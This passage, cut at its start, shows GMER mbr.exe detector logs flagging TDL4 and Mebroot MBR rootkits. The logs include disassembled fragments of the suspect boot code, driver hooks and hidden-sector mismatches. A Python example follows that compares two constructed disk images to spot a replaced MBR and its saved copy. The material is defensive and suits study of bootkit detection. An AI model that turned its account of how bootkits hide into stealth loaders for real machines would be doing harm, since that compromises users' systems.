    _asm { XOR AX, AX; MOV SS, AX; MOV SP, 0x7c00; MOV ES, AX; MOV DS, AX; MOV SI, 0x7c00; MOV DI, 0x600; MOV CX, 0x200; CLD ; REP MOVSB ; PUSH AX; PUSH 0x61c; RETF ; STI ; PUSHA ; MOV CX, 0x137; MOV BP, 0x62a; ROR BYTE [BP+0x0], CL; INC BP; }
    detected hooks:
    \Device\Ide\IdeDeviceP0T0L0-3 -> \??\IDE#DiskMaxtor_6Y120P0__________________________YAR41BW0#335930334d57455920
    2020202020202020202020#{53f56307-b6bf-11d0-94f2-00a0c91efb8b} device not found
    \Driver\atapi DriverStartIo -> 0x866DB3B2
    user != kernel MBR !!!
    sectors 240121726 (+241): user != kernel
    Warning: possible TDL4 rootkit infection !
    TDL4 rootkit infection detected ! Use: "mbr.exe -f" to fix.
    
    C:\>mbr -t -s
    Stealth MBR rootkit/Mebroot/Sinowal/TDL4 detector 0.4.2 by Gmer, http://www.gmer.net
    Windows 5.1.2600 Disk: ST3250620A rev.3.AAE -> Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-3 
    
    device: opened successfully
    user: MBR read successfully
    
    Disk trace:
    called modules: ntkrnlpa.exe CLASSPNP.SYS disk.sys >>UNKNOWN [0x813F4F80]<< 
    _asm { PUSH EBX; PUSH EDI; PUSH ESI; SUB ESP, 0x430; MOV DWORD [ESP+0x278], 0x39; MOV [ESP+0x204], EAX;  }
    1 ntkrnlpa!IofCallDriver[0x804EDE00] -> \Device\Harddisk0\DR0[0x8165C030]
    3 CLASSPNP[0xF99DD05B] -> ntkrnlpa!IofCallDriver[0x804EDE00] -> \Device\Ide\IdeDeviceP0T0L0-3[0x818003E8]
    \Driver\atapi[0x81800B30] -> IRP_MJ_INTERNAL_DEVICE_CONTROL -> 0x813F4F80
    kernel: MBR read successfully
    _asm { XOR AX, AX; MOV SS, AX; MOV SP, 0x7c00; STI ; PUSH AX; POP ES; PUSH AX; POP DS; CLD ; MOV SI, 0x7c1b; MOV DI, 0x61b; PUSH AX; PUSH DI; MOV CX, 0x1e5; REP MOVSB ; RETF ; MOV BP, 0x7be; MOV CL, 0x4; CMP [BP+0x0], CH; JL 0x2e; JNZ 0x3a;  }
    detected disk devices:
    detected hooks:
    \Driver\atapi -> 0x813f4f80
    NDIS: AMD PCNET Family PCI Ethernet Adapter -> SendCompleteHandler -> 0x81427a20
    user != kernel MBR !!!
    MBR rootkit infection detected ! Use: "mbr.exe -f" to fix.
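The detector outputs above rest on one idea: read the first sectors once through the normal (hookable) path and once at the lowest level the kernel allows, then compare. The 0.2.2 log reports the result as "copy of MBR has been found in sector 62", the TDL4 log as "sectors 240121726 (+241): user != kernel". The Python script below is an added example, not code from the page or from mbr.exe, that does the comparison part on two constructed in-memory images: the sector layout (loader in sector 0, kernel part in 61, MBR copy in 62), the partition table and the boot-code bytes are all constructed for the example. Reading the two views from a live disk is platform-specific and is left outside the script.

```python
import struct

SECTOR = 512
BOOT_SIG = b"\x55\xaa"

def build_mbr(boot_code: bytes, partition_table: bytes) -> bytes:
    """Assemble a 512-byte MBR: boot code padded to 446 bytes, 64-byte partition table, 0x55AA."""
    assert len(boot_code) <= 446 and len(partition_table) == 64
    return boot_code.ljust(446, b"\x00") + partition_table + BOOT_SIG

# Constructed partition table: one bootable entry (status 0x80, type 0x07,
# start LBA 63, 2097152 sectors) followed by three empty entries.
PARTITION_TABLE = struct.pack("<BBBBBBBBII", 0x80, 1, 1, 0, 0x07, 0xFE, 0xFF, 0xFF, 63, 2097152) + b"\x00" * 48
ORIGINAL_MBR = build_mbr(b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x90" * 24, PARTITION_TABLE)  # constructed clean loader
REPLACED_MBR = build_mbr(b"\xfa\xeb\xfe" + b"\xcc" * 40, PARTITION_TABLE)                  # constructed stand-in loader

def make_image(sectors: dict, count: int = 64) -> bytes:
    """Build a small constructed disk image of `count` sectors with the given sectors filled in."""
    img = bytearray(count * SECTOR)
    for n, data in sectors.items():
        img[n * SECTOR:(n + 1) * SECTOR] = data.ljust(SECTOR, b"\x00")
    return bytes(img)

# The hooked user-mode read path shows a clean disk; the low-level kernel read shows
# the page's layout: replaced MBR in sector 0, kernel part in 61, original MBR in 62.
USER_VIEW = make_image({0: ORIGINAL_MBR})
KERNEL_VIEW = make_image({0: REPLACED_MBR, 61: b"constructed kernel part of loader", 62: ORIGINAL_MBR})

def diff_sectors(a: bytes, b: bytes):
    """Runs (start, count) of sectors that differ between two views of the same disk."""
    runs, start = [], None
    n = min(len(a), len(b)) // SECTOR
    for i in range(n):
        same = a[i * SECTOR:(i + 1) * SECTOR] == b[i * SECTOR:(i + 1) * SECTOR]
        if not same and start is None:
            start = i
        elif same and start is not None:
            runs.append((start, i - start))
            start = None
    if start is not None:
        runs.append((start, n - start))
    return runs

def looks_like_mbr(sector: bytes) -> bool:
    """Boot signature present and at least one partition entry with a valid status and non-zero type."""
    if len(sector) != SECTOR or sector[510:] != BOOT_SIG:
        return False
    table = sector[446:510]
    entries = (table[i:i + 16] for i in range(0, 64, 16))
    return any(e[0] in (0x00, 0x80) and e[4] != 0 for e in entries)

def find_mbr_copies(image: bytes):
    """Sectors other than 0 that look like an MBR and carry the same partition table as sector 0."""
    table0 = image[446:510]
    copies = []
    for n in range(1, len(image) // SECTOR):
        s = image[n * SECTOR:(n + 1) * SECTOR]
        if looks_like_mbr(s) and s[446:510] == table0:
            copies.append(n)
    return copies

def compare_views(user: bytes, kernel: bytes):
    """Detector-style report lines for the two views; empty list when they agree."""
    lines = []
    if user[:SECTOR] != kernel[:SECTOR]:
        lines.append("user != kernel MBR !!!")
    for start, count in diff_sectors(user, kernel):
        lines.append(f"sectors {start} (+{count}): user != kernel")
    for n in find_mbr_copies(kernel):
        lines.append(f"copy of MBR has been found in sector {n} !")
    if lines:
        lines.append("Warning: possible MBR rootkit infection !")
    return lines

if __name__ == "__main__":
    print("\n".join(compare_views(USER_VIEW, KERNEL_VIEW)))
```

The partition-table match is what makes a stray sector a credible "copy of the original MBR" rather than any sector that happens to end in 0x55AA; a hidden-sector diff alone cannot tell a saved original from loader code.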